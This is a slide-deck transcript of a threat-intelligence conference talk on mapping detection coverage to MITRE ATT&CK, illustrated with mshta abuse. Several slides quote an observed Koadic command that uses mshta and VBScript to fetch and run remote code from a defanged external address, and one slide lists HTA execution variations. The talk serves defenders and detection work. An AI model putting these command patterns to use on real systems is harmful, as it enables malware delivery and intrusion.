Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

From Theory to Practice: How My ATTACK Perspectives Have Changed

From MITRE ATT&CKcon Power Hour December 2020

By Katie Nickels, Director of Intelligence, Red Canary

Good analysts (and good human beings) change their minds based on new information. In this presentation, Katie will share how her perspectives on ATT&CK have changed since moving from ATT&CK team member to ATT&CK end-user. She will discuss how her ideas about coverage, procedures, and detection creation have evolved and why those perspectives matter. Katie will also share practical examples from observed threats to help explain the nuances of her perspectives. Attendees should expect to leave this presentation with a better understanding of how to handle challenges they’re likely to face when navigating their own ATT&CK journey.

  • Be the first to comment

  • Be the first to like this

From Theory to Practice: How My ATTACK Perspectives Have Changed

  1. 1. From Theory to Practice: How My ATT&CKⓇ Perspectives Have Changed Katie Nickels ATT&CKcon Power Hour December 11, 2020
  2. 2. Yes, this is being recorded. Yes, the slides will be shared. No, I don’t know when. Soon.
  3. 3. § Former MITRE ATT&CK Team Member (relevant) § SANS Certified Instructor for FOR578: Cyber Threat Intelligence § Bringing context about threats to inform decisions § Maintaining sanity with exercise, chocolate, containers, and holiday lightsKatie Nickels DIRECTOR OF INTELLIGENCE RED CANARY @LiketheCoins About Me
  4. 4. Different perspectives help you think differently
  5. 5. 1. Tracking tactics, techniques, and procedures 2. Defining detection coverage 3. Choosing what to detect How I've thought differently about ATT&CK
  6. 6. Thinking through TTPs
  7. 7. Tracking TTPs the MITRE way https://attack.mitre.org/techniques/T1218/005/ Tactic: Defense Evasion Technique/Sub-technique: Signed Binary Proxy Execution: Mshta Procedure: Koadic can use MSHTA to serve additional payloads.[13]
  8. 8. A Koadic detection at Red Canary Procedure... So what’s this?
  9. 9. Tactics Techniques/Sub-techniques Procedures Observables We want to track things beyond TTPs
  10. 10. Defense Evasion/Execution T1218.005 Signed Binary Proxy Execution: Mshta Koadic used VBScript to launch mshta.exe and make an external network connection C:Windowssystem32mshta.EXE vbscript:CreateObject("WScript.Shell"). run("mshta hxxp[:]//8.8.8[.]8:123/12qwert",0)(window.close) Example of tracking beyond TTPs
  11. 11. Primary Tactic: Execution Additional Tactics Techniques Procedure ★ Observable Koadic uses VBScript to launch mshta.exe and make an external network connection. C:Windowssystem32mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:1234/1234656qwerty",0)(window.close) Detectors Name Targeted to this profile? WIN-MSHTA-CLI-URL No WIN-MSHTA-NON-HTA No WIN-MSHTA-INLINE-VBSCRIPT No TA0005 Defense Evasion T1218.005 Signed Binary Proxy Execution: Mshta T1059.005 Command and Scripting Interpreter: Visual Basic
  12. 12. What this format lets us do § Track detailed observables from endpoint telemetry § Identify where we have detection coverage (or not) § Use ATT&CK tactics, techniques, and sub-techniques ...but add on because it meets our needs
  13. 13. Defining detection coverage
  14. 14. Defining coverage by confidence https://i.blackhat.com/USA-19/Wednesday/us-19-Nickels-MITRE-ATTACK-The-Play-At-Home-Edition.pdf
  15. 15. The challenge of unlimited procedures “You should also remember that each ATT&CK technique may have many procedures for how an adversary could implement it — and because adversaries are always changing, we can’t know what all those procedures are in advance.” https://medium.com/mitre-attack/how-to-be-a-savvy-attack-consumer-63e45b8e94c9
  16. 16. Katie: “There are unlimited procedures!” § Matt: “But are there?” o Think of techniques like MSHTA o Commands only have so many flags § We may be able to be scope some technique variations
  17. 17. Defining detection coverage by variations
  18. 18. Tactics Techniques/Sub-techniques Variations Procedures Observables Tactics Techniques/Sub-techniques Adding in variations Variations are specific options made available to an attacker as defined by the technical components involved that comprise a technique (working definition)
  19. 19. Nine known variations for HTA 1. HTA can have any file name and extension 2. Specifying a URI from where HTA content is first downloaded 3. Use of scripting engines 4. Specifying protocol handlers (e.g., “vbscript”, “javascript”, “about”) 5. HTA content embedded and executed from within other file formats 6. HTA content can be executed remotely via UNC paths. 7. Remote HTA execution via COM interface (lateral movement) 8. HTA execution by double clicking or invoking with “explorer.exe foo.hta” 9. Full control over the path and filename of mshta.exe and rundll32.exe https://redcanary.com/blog/threat-research-questions
  20. 20. Adding in variations Defense Evasion/Execution T1218.005 Signed Binary Proxy Execution: Mshta Specifying protocol handler + direct download from URI Koadic used VBScript to launch mshta.exe and make an external network connection C:Windowssystem32mshta.EXE vbscript:CreateObject("WScript.Shell"). run("mshta hxxp[:]//8.8.8[.]8:123/12qwert",0)(window.close)
  21. 21. Mix and match the variations Specifying protocol handler vbscript: Direct download from URI mshta hxxp[:]//8.8.8[.]8:123/ Specifying protocol handler jscript: https://github.com/redcanaryco/AtomicTestHarnesses/tree/master/TestHarnesses/T1218.005_Mshta
  22. 22. Testing known variation combinations T1218.005 Signed Binary Proxy Execution: Mshta 25 tested combinations 1 technique More granular Less granular
  23. 23. Defining detection coverage by threat observables
  24. 24. Remember that profile breakdown? Techniques Observable Koadic uses VBScript to launch mshta.exe and make an external network connection. C:Windowssystem32mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:1234/1234656qwerty",0)(window.close) Detectors Name Targeted to this profile? WIN-MSHTA-CLI-URL No WIN-MSHTA-NON-HTA No WIN-MSHTA-INLINE-VBSCRIPT No T1218.005 Signed Binary Proxy Execution: Mshta T1059.005 Command and Scripting Interpreter: Visual Basic
  25. 25. Mapping coverage based on threats Koadic observable 1 Koadic observable 2 FIN7 observable 1 FIN7 observable 2 Kovter observable 1 Lazarus observable 1 6 threat observables for Mshta 1 technique More granular Less granular T1218.005 Signed Binary Proxy Execution: Mshta
  26. 26. So how should we explain detection coverage?
  27. 27. Explaining to leadership This is okay!
  28. 28. Koadic observable 1 Koadic observable 2 FIN7 observable 1 FIN7 observable 2 Lazarus observable 1 Diving deeper These are okay too! HTA test harness results Mshta threat observables
  29. 29. Expressing coverage is just tough § Any way you express it will have limitations § There’s no “right” or “wrong” way to do it ...but there may be “better” ways for your needs § Figure out the requirement for what you’re doing o What are you trying to convey and achieve? o What’s your goal of expressing the coverage?
  30. 30. Choosing what to detect
  31. 31. § Not everything is useful for detection § Choosing is most of the battle https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/ Finding “good” detection opportunities
  32. 32. § “Discovery techniques aren’t that useful for detection” https://i.blackhat.com/USA-19/Wednesday/us-19-Nickels-MITRE-ATTACK-The-Play-At-Home-Edition.pdf Discovery techniques
  33. 33. § “...except when they are” Domain Trust Discovery with nltest
  34. 34. § “This should NEVER happen in an environment, let’s write a detection analytic!” —Me in January 2020 § “Here’s a hypothesis that will probably be noisy so here are five ways to tune it when that happens.” —Me in December 2020 § If an analytic is noisy…how can we tune it? o Narrow it down? Use threat intelligence. o Easily suppress on false positives? Testing & tuning is most of the work https://redcanary.com/blog/tuning-detectors/
  35. 35. In closing
  36. 36. Takeaways § Don’t limit yourself to just TTPs if you need to go further § Define detection coverage based on your requirements § Trial, error, and experience will help you choose what to detect § It’s a good thing to change your perspectives § Surrounding yourself with new people and new situations lets you think differently and mature
  37. 37. Thank you! Katie Nickels @RedCanary @LiketheCoins https://redcanary.com/blog/

×